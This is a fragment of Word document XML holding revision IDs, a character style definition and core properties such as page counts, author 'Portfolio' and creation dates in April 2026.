    <w:rsid w:val="001332B7"/>
    <w:rsid w:val="001A2AD1"/>
    <w:rsid w:val="002643C9"/>
    <w:rsid w:val="003C741E"/>
    <w:rsid w:val="00492AF2"/>
    <w:rsid w:val="004A4162"/>
    <w:rsid w:val="004E4505"/>
    <w:rsid w:val="004F369C"/>
    <w:rsid w:val="005104CB"/>
    <w:rsid w:val="00550FF5"/>
    <w:rsid w:val="0066131E"/>
    <w:rsid w:val="006677EA"/>
    <w:rsid w:val="00677ECD"/>
    <w:rsid w:val="006C0002"/>
    <w:rsid w:val="00706A36"/>
    <w:rsid w:val="00787220"/>
    <w:rsid w:val="007B1BF1"/>
    <w:rsid w:val="007F0402"/>
    <w:rsid w:val="008557CB"/>
    <w:rsid w:val="008A77A3"/>
    <w:rsid w:val="008C7513"/>
    <w:rsid w:val="009229A4"/>
    <w:rsid w:val="009364BC"/>
    <w:rsid w:val="00AE4A45"/>
    <w:rsid w:val="00B13805"/>
    <w:rsid w:val="00B32619"/>
    <w:rsid w:val="00BB41D7"/>
    <w:rsid w:val="00BF5824"/>
    <w:rsid w:val="00BF5ECC"/>
    <w:rsid w:val="00C16F67"/>
    <w:rsid w:val="00C21BEF"/>
    <w:rsid w:val="00C30709"/>
    <w:rsid w:val="00CC3E7D"/>
    <w:rsid w:val="00CF509E"/>
    <w:rsid w:val="00D402F0"/>
    <w:rsid w:val="00D422E2"/>
    <w:rsid w:val="00D44ADA"/>
    <w:rsid w:val="00D74557"/>
    <w:rsid w:val="00DD1C02"/>
    <w:rsid w:val="00E77A97"/>
    <w:rsid w:val="00F83AA5"/>
    <w:rsid w:val="00FD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357D21-B212-4298-8486-0F8FE4B0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link w:val="20"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1A2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A2AD1"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="afb">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="003C74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6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ditmarketonline.ru/contact/log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18</Pages>
  <Words>4560</Words>
  <Characters>25994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Example Organization</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>30494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Portfolio</dc:creator>
  <cp:lastModifiedBy>Portfolio</cp:lastModifiedBy>
  <cp:revision>34</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-07T11:04:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-08T17:34:00Z</dcterms:modified>
</cp:coreProperties>
</file>